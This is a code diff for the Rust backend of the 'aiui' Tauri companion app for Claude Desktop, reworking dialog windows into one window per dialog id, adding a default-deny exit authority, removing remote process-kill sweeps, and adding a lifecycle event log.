+/// Currently wired only to macOS `RunEvent::Reopen`; other platforms have no
+/// trigger yet (Windows surfaces the existing window via the single-instance
+/// plugin), so allow it to be unused there instead of `#[cfg]`-gating the
+/// whole fn — keeps it ready for a future Windows hook without tripping CI's
+/// `-D warnings` dead-code check.
 #[cfg_attr(not(target_os = "macos"), allow(dead_code))]
 pub(crate) fn sweep_orphan_dialog_window(app: &tauri::AppHandle) {
-    let pending = app
-        .try_state::<Arc<dialog::DialogState>>()
-        .map(|s| s.stats().orphan_count)
-        .unwrap_or(0);
-    if pending == 0 && app.get_webview_window(DIALOG_WINDOW_LABEL).is_some() {
-        log::debug!("[aiui] sweep: destroying orphan dialog window (no pending dialog)");
-        destroy_dialog_window(app);
+    let Some(state) = app.try_state::<Arc<dialog::DialogState>>() else {
+        return;
+    };
+    // Collect dialog-window labels (ids) whose dialog is no longer registered.
+    let orphans: Vec<String> = app
+        .webview_windows()
+        .keys()
+        .filter(|l| is_dialog_window_label(l))
+        .filter(|l| state.get_request(l).is_none())
+        .cloned()
+        .collect();
+    for id in orphans {
+        log::debug!("[aiui] sweep: destroying orphan dialog window id={id} (no pending dialog)");
+        destroy_dialog_window(app, &id);
     }
 }
 
@@ -201,10 +311,14 @@ async fn surface_for_dialog(app: tauri::AppHandle) -> Result<(), String> {
     // The update dialog is surfaced from whichever window is alive when
     // the check fires — usually the setup window (frontend triggers it
     // from there). We just need *some* visible window to attach the OS
-    // dialog to.
-    let win = app
-        .get_webview_window(SETUP_WINDOW_LABEL)
-        .or_else(|| app.get_webview_window(DIALOG_WINDOW_LABEL));
+    // dialog to; fall back to any open dialog window (Step 4: dialog
+    // windows are labelled by id, so there's no single fixed label).
+    let win = app.get_webview_window(SETUP_WINDOW_LABEL).or_else(|| {
+        app.webview_windows()
+            .into_iter()
+            .find(|(label, _)| is_dialog_window_label(label))
+            .map(|(_, w)| w)
+    });
     if let Some(win) = win {
         let _ = win.show();
         let _ = win.set_focus();
@@ -432,6 +546,12 @@ fn open_url(url: String) -> Result<(), String> {
 /// running. Issue #72.
 #[tauri::command]
 async fn quit_app(app: tauri::AppHandle) -> Result<(), String> {
+    // Case (b): explicit uninstall. Latch the exit authority *first* so the
+    // `ExitRequested` default-deny gate honours the `app.exit(0)` below instead
+    // of vetoing it (Invariant I1).
+    if let Some(auth) = app.try_state::<Arc<lifetime::ExitAuthority>>() {
+        auth.authorize();
+    }
     let killed = housekeeping::kill_all_mcp_stdio_children();
     logging::trace(&format!(
         "quit_app: killed {killed} mcp-stdio child(ren) before exit"
@@ -449,6 +569,21 @@ async fn quit_app(app: tauri::AppHandle) -> Result<(), String> {
     Ok(())
 }
 
+/// Latch the exit authority for case (c): an update-restart driven from the
+/// frontend updater. `updater.ts` calls this immediately before
+/// `@tauri-apps/plugin-process`'s `relaunch()`, which (like `app.restart()`)
+/// fires `RunEvent::ExitRequested`. Without the latch the default-deny gate
+/// would veto the relaunch and the update would never apply (Invariant I1).
+/// The HTTP `/update` path latches the same authority directly in Rust.
+#[tauri::command]
+async fn authorize_exit_for_update(
+    exit_authority: tauri::State<'_, Arc<lifetime::ExitAuthority>>,
+) -> Result<(), String> {
+    exit_authority.authorize();
+    logging::trace("authorize_exit_for_update: exit authority latched for update-restart");
+    Ok(())
+}
+
 /// Quit + relaunch Claude Desktop so it re-reads `claude_desktop_config.json`
 /// and picks up the freshly-patched aiui MCP server entry. This is the
 /// "after-Setup nudge" the user otherwise has to figure out themselves.
@@ -696,15 +831,11 @@ async fn add_remote(
     );
     let config_ok = config_step.ok;
     results.push(config_step);
-    // Fresh add — there shouldn't be a running child yet, but a
-    // re-add (Remove + Add the same host) leaves stale ones; sweep
-    // them so the first tool call respawns clean against the new pin.
-    if matches!(config_patch, Some(setup::RemoteConfigPatch::Patched)) {
-        let sweep = setup::kill_remote_mcp_stdio(&host_alias);
-        if !sweep.ok {
-            results.push(sweep);
-        }
-    }
+    // Step 2: no version-forcing kill here. A re-add re-pins the version in
+    // ~/.claude.json; the new pin takes effect at the next natural Claude Code
+    // spawn. We never `pkill -f aiui-mcp` to force it — that crashed live
+    // sessions mid-call and hit every other session on the host.
+    let _ = config_patch;
 
     if !(token_ok && config_ok) {
         // Don't persist the host or start a tunnel for a half-failed
@@ -742,39 +873,32 @@ async fn reinstall_skill() -> Result<Vec<setup::StepResult>, String> {
     Ok(results)
 }
 
-/// On-demand resync trigger for a single registered remote — wraps
-/// the same patch-pin + kill-stale-mcp-stdio sequence that runs in
-/// the background at every aiui-app startup. Surfaced as a per-remote
-/// button in Settings so the user can re-invoke it without restarting
-/// aiui (and see the StepResult log inline if a sweep fails).
+/// On-demand resync trigger for a single registered remote — re-pins the
+/// aiui-mcp version in the remote's `~/.claude.json`. Surfaced as a per-remote
+/// button in Settings so the user can re-invoke the pin without restarting
+/// aiui (and see the StepResult log inline).
 ///
-/// Why this exists: 0.4.29's auto-resync on GUI-start is silent — if
-/// the SSH-side `pkill` fails (remote temporarily unreachable) the
-/// stale subprocess keeps running with the previous version. Without
-/// a manual trigger, the user would have to close + reopen aiui-app
-/// to retry. v0.4.34 adds the on-demand path.
+/// Step 2 change: this used to also `pkill -f aiui-mcp` on the host to force
+/// the new version onto a running session. That is gone — the kill crashed
+/// live sessions mid-call (Claude Code does not respawn a disconnected MCP)
+/// and had cross-session blast radius. The re-pin alone is the correct,
+/// session-safe action: it takes effect at the next natural spawn while any
+/// in-flight session finishes on its current version. If the user genuinely
+/// wants a running remote session on the new version *now*, the cooperative
+/// path is to end and restart that Claude Code session.
 #[tauri::command]
 async fn resync_remote(
     host_alias: String,
 ) -> Result<Vec<setup::StepResult>, String> {
     let our_version = env!("CARGO_PKG_VERSION");
-    // Re-pin in `~/.claude.json` on the remote (idempotent — if
-    // already pinned, no rewrite, returns AlreadyCurrent).
-    let (pin_step, patch) = setup::patch_claude_code_config_remote(
+    // Re-pin in `~/.claude.json` on the remote (idempotent — if already
+    // pinned, no rewrite, returns AlreadyCurrent).
+    let (pin_step, _patch) = setup::patch_claude_code_config_remote(
         &host_alias,
         None,
         our_version,
     );
-    let mut results = vec![pin_step];
-    // Sweep stale aiui-mcp children only when the pin actually
-    // changed (or unconditionally? — yes, unconditionally on
-    // user-triggered resync, because the user wouldn't click resync
-    // unless they suspect drift). On unconditional sweep: kills any
-    // running aiui-mcp regardless of pin state, which is what the
-    // user wants from a "force fresh" button.
-    let _ = patch;  // not used here, but kept for tracing
-    results.push(setup::kill_remote_mcp_stdio(&host_alias));
-    Ok(results)
+    Ok(vec![pin_step])
 }
 
 #[tauri::command]
@@ -924,96 +1048,106 @@ pub(crate) fn build_setup_window(
 /// `dialog::estimate_dialog_size`. The window is resizable, so the user
 /// can drag past these defaults — we just pick a sensible starting
 /// geometry given what the agent asked us to render.
-pub(crate) fn ensure_dialog_window(
+/// Build a fresh dialog window labelled by the dialog `id` (Step 4
+/// multi-window: one window per render, never reused — N may be open at once).
+/// It loads `dialog.html`, which reads its own window label (= id) and *pulls*
+/// the render payload via `get_dialog_spec` on mount. Promotes the app to
+/// Regular so the window fronts above Claude Desktop (in Accessory mode macOS
+/// won't bring our windows forward even with `set_focus()`);
+/// `close_window` / `destroy_dialog_window` demote back to Accessory once the
+/// last dialog is gone.
+pub(crate) fn build_dialog_window(
     app: &tauri::AppHandle,
+    id: &str,
     size: (f64, f64),
+    title: &str,
 ) -> tauri::Result<tauri::WebviewWindow> {
-    // Promote the app from Accessory to Regular for the duration of the
-    // dialog. In Accessory mode (LSUIElement-style daemon, no Dock icon)
-    // macOS won't bring our windows to the front above other apps even
-    // with `set_focus()` — the agent renders a dialog and the user
-    // doesn't see it because Claude Desktop covers it. Promoting to
-    // Regular for the dialog window restores normal front/focus
-    // behaviour; we drop back to Accessory in `close_window` once the
-    // dialog finishes so we don't permanently grow a Dock icon.
     #[cfg(target_os = "macos")]
     {
         let _ = app.set_activation_policy(tauri::ActivationPolicy::Regular);
     }
-    if let Some(win) = app.get_webview_window(DIALOG_WINDOW_LABEL) {
-        // Resize to fit the new spec before surfacing. Without this,
-        // a confirm rendered after a long form would keep the form's
-        // tall geometry (and vice versa).
-        let _ = win.set_size(tauri::LogicalSize::new(size.0, size.1));
-        let _ = win.show();
-        let _ = win.set_focus();
-        let _ = win.unminimize();
-        // Briefly mark the window always-on-top to win against any
-        // app that's grabbed focus in the meantime, then lift the
-        // flag so the user can naturally Cmd+Tab away later. 800 ms
-        // is enough for the activation to settle without leaving a
-        // sticky front-most window.
-        let _ = win.set_always_on_top(true);
-        let app_for_lift = app.clone();
-        std::thread::spawn(move || {
-            std::thread::sleep(std::time::Duration::from_millis(800));
-            if let Some(w) = app_for_lift.get_webview_window(DIALOG_WINDOW_LABEL) {
-                let _ = w.set_always_on_top(false);
+    // Clamp the requested start size to the monitor's usable area, so an
+    // agent asking for `size:"l"` (or explicit width/height) on a small
+    // screen can't open a window taller/wider than the display. Leaves a
+    // margin for the menu bar / Dock. The window stays resizable, so the
+    // user can still grow it past this if they want.
+    let size = {
+        let mut s = size;
+        if let Ok(Some(mon)) = app.primary_monitor() {
+            let sf = mon.scale_factor();
+            let phys = mon.size();
+            let avail_w = (phys.width as f64 / sf) * 0.95;
+            let avail_h = (phys.height as f64 / sf) * 0.92;
+            if avail_w > 360.0 {
+                s.0 = s.0.min(avail_w);
             }
-        });
-        return Ok(win);
-    }
-    // Window is being built fresh — its frontend listeners aren't up
-    // yet. Reset the ready flag so the render path waits for the
-    // `dialog_window_ready` signal before emitting `dialog:show`.
-    if let Some(tx) = app.try_state::<Arc<tokio::sync::watch::Sender<bool>>>() {
-        let _ = tx.inner().send(false);
-    }
-    WebviewWindowBuilder::new(
-        app,
-        DIALOG_WINDOW_LABEL,
-        WebviewUrl::App("dialog.html".into()),
-    )
-    .title("aiui")
-    // Initial size from `estimate_dialog_size` — we widen for
-    // wireframe/mermaid/table and grow vertically for long forms,
-    // clamped to (1100, 900). Resizable so the user always has the
-    // last word; min size keeps the dialog usable but prevents
-    // accidental sub-icon collapse. v0.4.40.
-    .inner_size(size.0, size.1)
-    .min_inner_size(360.0, 320.0)
-    .resizable(true)
-    .center()
-    // Native, fully-visible title bar so macOS handles window-drag
-    // for us. Tauri's `data-tauri-drag-region` HTML attribute and
-    // Chromium's `-webkit-app-region: drag` CSS are *both* unreliable
-    // on Tauri 2 + WKWebView (macOS 26): the first sometimes drops
-    // mousedown depending on z-order, the second is a Chromium-only
-    // CSS property that WKWebView doesn't honour at all. The only
-    // robust path is to let macOS run its own title-bar drag, which
-    // means a visible title bar (the previous "Overlay + hiddenTitle"
-    // setup hid the title-bar pixels but kept its drag behaviour
-    // half-broken). We accept the slightly-less-flush look in
-    // exchange for a window the user can actually move.
-    .decorations(true)
-    .disable_drag_drop_handler()
-    .visible(true)
-    .always_on_top(true)
-    .build()
-    .inspect(|_win| {
-        // Fresh dialog windows also get the same lift-after-800 ms
-        // treatment as the reused-window branch above. The
-        // always_on_top flag from the builder ensures the window
-        // appears above everything; we drop it shortly after so
-        // Cmd+Tab works normally afterwards.
-        let app_for_lift = app.clone();
-        std::thread::spawn(move || {
-            std::thread::sleep(std::time::Duration::from_millis(800));
-            if let Some(w) = app_for_lift.get_webview_window(DIALOG_WINDOW_LABEL) {
-                let _ = w.set_always_on_top(false);
+            if avail_h > 320.0 {
+                s.1 = s.1.min(avail_h);
             }
-        });
-    })
+        }
+        s
+    };
+    let id_for_lift = id.to_string();
+    WebviewWindowBuilder::new(app, id, WebviewUrl::App("dialog.html".into()))
+        // Session identity (I8) in the native title bar. Set here in Rust —
+        // the frontend `setTitle` is blocked without a `core:window:set-title`
+        // capability, so the Rust builder is the reliable place.
+        .title(title)
+        // Initial size from `estimate_dialog_size` — we widen for
+        // wireframe/mermaid/table and grow vertically for long forms,
+        // clamped to (1100, 900). Resizable so the user always has the last
+        // word; min size keeps the dialog usable. v0.4.40.
+        .inner_size(size.0, size.1)
+        .min_inner_size(360.0, 320.0)
+        .resizable(true)
+        .center()
+        // Native, fully-visible title bar so macOS handles window-drag for us
+        // (Tauri's HTML drag-region and the `-webkit-app-region` CSS are both
+        // unreliable on Tauri 2 + WKWebView). v0.4.40.
+        .decorations(true)
+        .disable_drag_drop_handler()
+        .visible(true)
+        .always_on_top(true)
+        // Focus the fresh window so macOS doesn't eat the user's FIRST click
+        // just to make it key ("first mouse" — the 2026-05-31 "have to click
+        // twice" report). The old single-reused-window path called set_focus();
+        // the per-id rewrite dropped it. Belt-and-suspenders with set_focus()
+        // in the inspect below.
+        .focused(true)
+        .build()
+        .inspect(|win| {
+            // Cascade (2026-05-31 report): offset each *additional* open dialog
+            // so stacked windows don't sit exactly on top of each other. Keyed
+            // on the count of OTHER dialog windows currently open — NOT a
+            // monotonic counter — and wrapped at 8 steps, so closing a window
+            // frees its slot, the first/only dialog always opens centered, and
+            // they never march off the bottom-right over a long session.
+            let others = app
+                .webview_windows()
+                .keys()
+                .filter(|l| is_dialog_window_label(l) && l.as_str() != id)
+                .count();
+            if others > 0 {
+                if let Ok(pos) = win.outer_position() {
+                    let sf = win.scale_factor().unwrap_or(1.0);
+                    let off = ((others % 8) as f64 * 28.0 * sf) as i32;
+                    let _ = win
+                        .set_position(tauri::PhysicalPosition::new(pos.x + off, pos.y + off));
+                }
+            }
+            // Make the window key so the user's first click lands on a control
+            // instead of being consumed to focus the window.
+            let _ = win.set_focus();
+            // Briefly always-on-top to win the focus race, then lift it so
+            // Cmd+Tab works normally afterwards.
+            let app_for_lift = app.clone();
+            std::thread::spawn(move || {
+                std::thread::sleep(std::time::Duration::from_millis(800));
+                if let Some(w) = app_for_lift.get_webview_window(&id_for_lift) {
+                    let _ = w.set_always_on_top(false);
+                }
+            });
+        })
 }
 
 /// True when no aiui window is currently visible to the user. Used by
@@ -1122,6 +1256,9 @@ pub fn run_mcp_stdio_only() {
 #[cfg_attr(mobile, tauri::mobile_entry_point)]
 pub fn run() {
     let cfg = Arc::new(config::AppConfig::load_or_init().expect("config init"));
+    lifecycle_log::record(lifecycle_log::LifecycleEvent::Startup {
+        interactive: lifetime::is_interactive_session(),
+    });
 
     // Process-lifetime advisory lock (v0.4.43). Held from the very
     // first line of run() until the process dies. Two GUIs spawned in
@@ -1174,6 +1311,12 @@ pub fn run() {
     let dialog_state = Arc::new(dialog::DialogState::new());
     let ui_acks = Arc::new(ack::AckRegistry::new());
     let lifetime_stats = Arc::new(lifetime::LifetimeStats::new());
+    // Single exit authority (Invariant I1). Latched only by the two legitimate
+    // non-Wirt-death exits — uninstall (`quit_app`) and update-restart (HTTP
+    // `/update` + the frontend updater) — and read by the `ExitRequested`
+    // default-deny gate so those, and only those, Tauri-initiated terminations
+    // are honoured while Claude Desktop is alive.
+    let exit_authority = Arc::new(lifetime::ExitAuthority::new());
     let tunnel_mgr = tunnel::TunnelManager::new(cfg.http_port);
     // Shared cell that records a fatal HTTP-server bind/serve failure (e.g.
     // port 7777 held by another process). Read by the `status` command and
@@ -1197,17 +1340,9 @@ pub fn run() {
     // it apart from `http_error` (same underlying type).
     let pending_update = Arc::new(PendingUpdate::default());
 
-    // Window-ready handshake: the dialog window's frontend signals
-    // here (via the `dialog_window_ready` Tauri command) once its
-    // listeners are wired up. The render path *waits* on this watch
-    // before emitting `dialog:show`, so a freshly-built dialog window
-    // never receives an event before its listener is registered. The
-    // 0.4.30 fix — without it, a 500 ms ack timeout could fire before
-    // the WebView even finished mounting Svelte (especially on the
-    // very first render of a session, when the window is built fresh
-    // and Vite has to load the bundle).
-    let (dialog_ready_tx, _dialog_ready_rx) = tokio::sync::watch::channel(false);
-    let dialog_ready_tx = Arc::new(dialog_ready_tx);
+    // (Step 4: the old `dialog_window_ready` watch handshake is gone — the
+    // per-id dialog window pulls its spec via `get_dialog_spec` on mount, so
+    // there's no emit to race and nothing to wait on.)
 
     let rt = tokio::runtime::Builder::new_multi_thread()
         .enable_all()
@@ -1259,16 +1394,16 @@ pub fn run() {
         .manage(dialog_state.clone())
         .manage(ui_acks.clone())
         .manage(lifetime_stats.clone())
+        .manage(exit_authority.clone())
         .manage(tunnel_mgr.clone())
         .manage(http_error.clone())
         .manage(pending_update.clone())
-        .manage(dialog_ready_tx.clone())
         .invoke_handler(tauri::generate_handler![
             dialog_submit,
             dialog_cancel,
-            dialog_received,
+            write_dialog_targets,
+            get_dialog_spec,
             ui_pong,
-            dialog_window_ready,
             close_window,
             surface_for_dialog,
             is_update_safe_to_install,
@@ -1283,6 +1418,7 @@ pub fn run() {
             restart_claude_desktop,
             uninstall_all,
             quit_app,
+            authorize_exit_for_update,
             dismiss_welcome,
             open_url
         ])
@@ -1475,13 +1611,16 @@ pub fn run() {
                                     None => "unknown",
                                 }
                             ));
-                            if matches!(patch, Some(setup::RemoteConfigPatch::Patched)) {
-                                let sweep = setup::kill_remote_mcp_stdio(&host_for_task);
-                                logging::trace(&format!(
-                                    "remote-pin: {host_for_task}: sweep {}",
-                                    if sweep.ok { "ok" } else { "failed" }
-                                ));
-                            }
+                            // Step 2 (Invariant: never kill a remote bridge to
+                            // force a version): we used to `pkill -f aiui-mcp`
+                            // here whenever the pin changed. That blunt sweep
+                            // crashed live remote sessions mid-call (Claude Code
+                            // does NOT respawn a disconnected MCP) and had
+                            // cross-session blast radius — the remote twin of
+                            // the 0.4.42 Cowork-kill. The pin alone is enough:
+                            // it takes effect at the next *natural* spawn (next
+                            // Claude Code session), while any live session keeps
+                            // its current version until it ends on its own.
                         } else {
                             logging::trace(&format!(
                                 "remote-pin: {host_for_task} sync failed: {} ({})",
@@ -1568,138 +1707,116 @@ pub fn run() {
             Ok(())
         })
         .on_window_event(|window, event| {
-            // Multi-window lifecycle (v0.4.25, revised v0.4.36):
+            // Multi-window lifecycle (v0.4.25, revised v0.4.36, Invariant I2):
             //
-            // The setup window and the dialog window are independent.
-            // Closing one shouldn't kill the other — and definitely
-            // shouldn't kill the GUI process while the lifetime
-            // socket still has attached MCP-stdio children depending
-            // on it.
+            // The setup window and the dialog window are independent, and
+            // closing a window is never a process exit — the host lives with
+            // its Wirt (Claude Desktop), not with any window.
             //
-            //  • Red X on setup window: setup goes away. If no other
-            //    window is visible AND no MCP-stdio children are
-            //    attached, the app quits and `mcp_attach`'s
-            //    auto-resurrect path brings it back on the next tool
-            //    call. As long as a child is attached, we stay alive
-            //    headless — the lifetime grace timer (60s after the
-            //    last child detaches) is the only legitimate
-            //    "nobody needs aiui anymore" signal.
-            //  • Red X on dialog window: the dialog is treated as
-            //    cancelled (the frontend's CloseRequested-listener
-            //    fires `dialog_cancel` first; this branch runs after).
-            //    NEVER quits the app, regardless of any-visible state.
-            //    The dialog window is per-call ephemeral — destroyed
-            //    after every submit/cancel by `close_window`. Quitting
-            //    the GUI here would tear down the HTTP server while
-            //    the agent's tool call is still parsing the response,
-            //    producing the 8s `wait_for_aiui` timeouts the user
-            //    saw on 2026-05-04 (trace 16:11:42.197 "GUI is gone"
-            //    20 ms after a successful form submit).
-            if let tauri::WindowEvent::CloseRequested { .. } = event {
+            //  • Red X on setup window: hide it + demote to Accessory (no Dock
+            //    icon). The host stays alive headless; it is brought back to a
+            //    visible Settings window via Dock-click / `open` (the Reopen
+            //    handler) or the single-instance plugin. No exit here — the
+            //    process only ends when the watcher sees the Wirt gone or an
+            //    uninstall/update latches the exit authority.
+            //  • Red X on dialog window: the dialog is treated as cancelled
+            //    (the frontend's CloseRequested-listener fires `dialog_cancel`
+            //    first; this branch runs after). NEVER quits the app. The
+            //    dialog window is per-call ephemeral — destroyed after every
+            //    submit/cancel by `close_window`. Quitting the GUI here would
+            //    tear down the HTTP server while the agent's tool call is still
+            //    parsing the response, producing the 8s `wait_for_aiui`
+            //    timeouts the user saw on 2026-05-04 (trace 16:11:42.197 "GUI
+            //    is gone" 20 ms after a successful form submit).
+            if let tauri::WindowEvent::CloseRequested { api, .. } = event {
                 let app = window.app_handle();
                 let closed_label = window.label().to_string();
-                if closed_label == DIALOG_WINDOW_LABEL {
-                    // User closed the dialog window with the native X (or
-                    // ⌘W). Resolve any in-flight `/render` as cancelled
-                    // right here in Rust — we no longer depend on a
-                    // frontend CloseRequested handler, which in 0.4.45
-                    // could `preventDefault()` and then fail to complete
-                    // the close, stranding an empty, unclosable window
-                    // (Bug B, the 2026-05-29 overnight report). We do NOT
-                    // prevent the close: the window is allowed to go away.
-                    // The awaiting `/render` will run its end-of-handler
-                    // `destroy_dialog_window` (a no-op by then).
+                if is_dialog_window_label(&closed_label) {
+                    // User closed THIS dialog window with the native X (or
+                    // ⌘W). Multi-window (Step 4): the window label is the
+                    // dialog id, so cancel exactly that dialog — never the
+                    // others that may be open for parallel sessions. Resolve
+                    // it as cancelled right here in Rust (we no longer depend
+                    // on a frontend CloseRequested handler, which in 0.4.45
+                    // could `preventDefault()` then fail to complete the
+                    // close, stranding an empty window — Bug B). We do NOT
+                    // prevent the close; the awaiting `/render` runs its
+                    // end-of-handler `destroy_dialog_window` (a no-op by then).
                     if let Some(ds) = app.try_state::<Arc<dialog::DialogState>>() {
-                        let n = ds.cancel_all("window_closed");
-                        if n > 0 {
-                            log::debug!(
-                                "[aiui] dialog window X-closed — cancelled {n} pending dialog(s)"
-                            );
-                        }
+                        ds.cancel(&closed_label);
                     }
+                    // Mark the teardown so a Reopen fired as a side-effect of
+                    // this close doesn't surface the settings window.
+                    mark_dialog_teardown();
                     log::debug!(
-                        "[aiui] dialog window closed — staying alive for further tool calls"
+                        "[aiui] dialog window {closed_label} X-closed — cancelled its dialog, host stays alive"
                     );
                     return;
                 }
-                // Setup window: quit only if nothing else needs us.
-                let app_for_check = app.clone();
-                let _ = app.run_on_main_thread(move || {
-                    let any_visible = app_for_check
-                        .webview_windows()
-                        .iter()
-                        .any(|(label, w)| {
-                            label.as_str() != closed_label
-                                && w.is_visible().unwrap_or(false)
-                        });
-                    let attached = app_for_check
-                        .try_state::<Arc<lifetime::LifetimeStats>>()
-                        .map(|s| s.child_count())
-                        .unwrap_or(0);
-                    if !any_visible && attached == 0 {
-                        log::info!(
-                            "[aiui] setup window closed and no MCP-stdio children attached — quitting; auto-resurrect will bring us back on next tool call"
-                        );
-                        let port = app_for_check
-                            .try_state::<Arc<config::AppConfig>>()
-                            .map(|c| c.http_port)
-                            .unwrap_or(7777);
-                        housekeeping::pre_exit_cleanup(port, "setup-close-no-children");
-                        app_for_check.exit(0);
-                    } else {
-                        log::debug!(
-                            "[aiui] setup window closed, staying alive (visible_others={any_visible}, attached_children={attached})"
-                        );
-                    }
-                });
+                // Setup window: Invariant I2 — window close is NOT process
+                // exit. Hide the window and demote back to Accessory (no Dock
+                // icon) so aiui keeps living headless with its host (Claude
+                // Desktop), serving the lifetime socket + HTTP for local and
+                // remote dialogs. The process only ends when its Wirt quits
+                // (the watcher) or on an explicit uninstall/update — never
+                // because a user dismissed a window. The old
+                // `setup-close-no-children → app.exit(0)` path (which decided
+                // "nobody needs us" from the child count + window visibility,
+                // both proxies) is removed.
+                api.prevent_close();
+                let _ = window.hide();
+                #[cfg(target_os = "macos")]
+                {
+                    let _ = app.set_activation_policy(tauri::ActivationPolicy::Accessory);
+                }
+                lifecycle_log::record(lifecycle_log::LifecycleEvent::WindowHidden);
+                log::debug!(
+                    "[aiui] setup window close → hidden + demoted to Accessory (host stays alive; I2)"
+                );
             }
         })
         .build(tauri::generate_context!())
         .expect("error building tauri application")
         .run(|app, event| {
-            // ExitRequested handler (v0.4.43 introduced cleanup; v0.4.44
-            // adds the veto for the "headless mode" case). Tauri fires
-            // ExitRequested on Cmd-Q, on ⌘W of the last visible
+            // ExitRequested gate — single exit authority (Invariant I1). Tauri
+            // fires ExitRequested on ⌘Q, on ⌘W / close of the last visible
             // window, on OS shutdown, and on `.restart()`. The
-            // last-window-close case is the dangerous one: as soon as
-            // the agent's dialog window closes after a submit, Tauri
-            // wants to terminate the process — but that's wrong while
-            // the GUI is meant to live headless serving the lifetime
-            // socket. v0.4.42 lost the GUI ~18 ms after every Dialog
-            // submit through this path (trace 2026-05-26 17:00:28.181
-            // → 17:00:28.199); the dialog-window-close branch of
-            // on_window_event already returned without exit, but
-            // Tauri's default ExitRequested handler ran *after* it
-            // and killed the process anyway.
+            // last-window-close case is the dangerous one: as soon as the
+            // agent's dialog window closes after a submit, Tauri wants to
+            // terminate the process — but the host is meant to live headless
+            // serving the lifetime socket + HTTP. v0.4.42 lost the GUI ~18 ms
+            // after every dialog submit through exactly this path (trace
+            // 2026-05-26 17:00:28.181 → 17:00:28.199).
             //
-            // Resolution rule:
-            //   • Anyone still depending on us — an attached
-            //     mcp-stdio child or a pending dialog — ⇒ veto the
-            //     exit via `api.prevent_exit()`. The lifetime-grace
-            //     timer (60 s after the last child detaches) remains
-            //     the *only* legitimate "everyone's gone, really
-            //     exit" signal in normal operation.
-            //   • Nobody attached and no pending dialog ⇒ honour the
-            //     exit, but run pre_exit_cleanup first so any ssh-NTR
-            //     tunnel children get SIGTERM instead of becoming
-            //     launchd orphans.
-            if let tauri::RunEvent::ExitRequested { api, code, .. } = &event {
-                let attached = app
-                    .try_state::<Arc<lifetime::LifetimeStats>>()
-                    .map(|s| s.child_count())
-                    .unwrap_or(0);
-                let pending_dialogs = app
-                    .try_state::<Arc<dialog::DialogState>>()
-                    .map(|s| s.stats().orphan_count)
-                    .unwrap_or(0);
-
-                if code.is_none() && (attached > 0 || pending_dialogs > 0) {
-                    // Tauri-initiated quit (no explicit exit code).
-                    // Someone still needs us — keep the process alive.
+            // The decision no longer reads child count or window visibility —
+            // both were proxies that the 0.4.43–0.4.45 patches kept getting
+            // wrong. It is `host_should_exit(explicit, cd_running)`: honour the
+            // exit only when an uninstall/update latched `ExitAuthority`, or
+            // the Wirt (Claude Desktop) is already gone; otherwise default-deny
+            // via `api.prevent_exit()`. The watcher owns the CD-gone exit in
+            // normal operation; this gate is the backstop for every other
+            // Tauri-initiated termination.
+            if let tauri::RunEvent::ExitRequested { api, .. } = &event {
+                // Default-deny (Invariant I1). The only legitimate planned
+                // exits are: (b) uninstall / (c) update-restart — both latch
+                // `ExitAuthority` before asking Tauri to terminate — or (a) the
+                // Wirt (Claude Desktop) is already gone. Every other
+                // Tauri-initiated exit (last-window-close, ⌘Q, OS quit-all) is
+                // vetoed. This is what stops the headless host dying ~18 ms
+                // after a dialog submit (v0.4.42) and on overnight churn
+                // (v0.4.45): the child count and window visibility no longer
+                // enter the decision at all.
+                let explicit = app
+                    .try_state::<Arc<lifetime::ExitAuthority>>()
+                    .map(|a| a.is_authorized())
+                    .unwrap_or(false);
+                let cd_running = setup::is_claude_desktop_running();
+                if !lifetime::host_should_exit(explicit, cd_running) {
                     logging::trace(&format!(
-                        "[aiui] veto tauri-exit-requested: attached_children={attached}, \
-                         pending_dialogs={pending_dialogs}"
+                        "[aiui] veto ExitRequested (default-deny): explicit={explicit}, \
+                         claude_desktop_running={cd_running}"
                     ));
+                    lifecycle_log::record(lifecycle_log::LifecycleEvent::ExitDenied);
                     api.prevent_exit();
                     return;
                 }
@@ -1708,11 +1825,20 @@ pub fn run() {
                     .try_state::<Arc<config::AppConfig>>()
                     .map(|cfg| cfg.http_port)
                     .unwrap_or(7777);
-                let reason = if code.is_some() {
-                    "tauri-exit-requested-explicit"
+                let reason = if explicit {
+                    "exit-authorized-uninstall-or-update"
                 } else {
-                    "tauri-exit-requested-no-attached"
+                    "exit-claude-desktop-gone"
                 };
+                lifecycle_log::transition(lifecycle_log::Phase::Exiting);
+                lifecycle_log::record(lifecycle_log::LifecycleEvent::HostExit { reason });
+                // Forensic dump of the lifetime event ring on the way out —
+                // the post-hoc record that was missing during the 0.4.x
+                // instability (#137 cross-cutting).
+                for line in lifecycle_log::recent() {
+                    logging::trace(&format!("[aiui] lifecycle-dump {line}"));
+                }
+                logging::trace(&format!("[aiui] honouring ExitRequested: {reason}"));
                 housekeeping::pre_exit_cleanup(port, reason);
             }
 
@@ -1734,7 +1860,14 @@ pub fn run() {
                     // would otherwise be greeted by a leftover empty
                     // frame (v0.4.46, Bug B+).
                     sweep_orphan_dialog_window(app);
-                    show_settings_window(app);
+                    // BUT: macOS also fires Reopen as a side-effect of a dialog
+                    // window closing. Surfacing settings then is the
+                    // 2026-05-31 "setup window popped up after I closed a
+                    // dialog" bug. Only surface settings for a *genuine*
+                    // reactivation — i.e. not right after a dialog teardown.
+                    if !dialog_torn_down_recently() {
+                        show_settings_window(app);
+                    }
                 }
             }
             #[cfg(not(target_os = "macos"))]
diff --git a/companion/src-tauri/src/lifecycle_log.rs b/companion/src-tauri/src/lifecycle_log.rs
new file mode 100644
index 0000000..9edad76
--- /dev/null
+++ b/companion/src-tauri/src/lifecycle_log.rs
@@ -0,0 +1,214 @@
+//! Issue #137 cross-cutting: an explicit lifecycle state machine + named
+//! event log, replacing the ad-hoc `trace()` calls scattered across the
+//! host-lifetime decision points.
+//!
+//! The whole 0.4.x whack-a-mole came from the lifetime logic being implicit:
+//! a child-counter proxy, a 60 s grace, scattered traces — no single place
+//! that said "we are in phase X and just moved to Y because Z". This module
+//! makes the host's lifetime an explicit, named [`Phase`] with logged
+//! transitions, plus a bounded ring of the most recent [`LifecycleEvent`]s
+//! for post-hoc diagnosis (the coverage gap that made the instability so hard
+//! to pin down).
+//!
+//! It is deliberately tiny and lock-simple: the lifetime path is low
+//! frequency (a few events per disconnect edge), so a single `Mutex` and a
+//! `VecDeque` are plenty. Recording an event also emits a structured
+//! `trace()` line so existing log tooling keeps working.
+
+use std::collections::VecDeque;
+use std::sync::{Mutex, OnceLock};
+use std::time::Instant;
+
+/// Max events retained in the in-memory ring (oldest dropped past this).
+const RING_CAP: usize = 256;
+
+/// The host's lifetime phase. A small, total state set — every transition
+/// goes through [`transition`], which logs it.
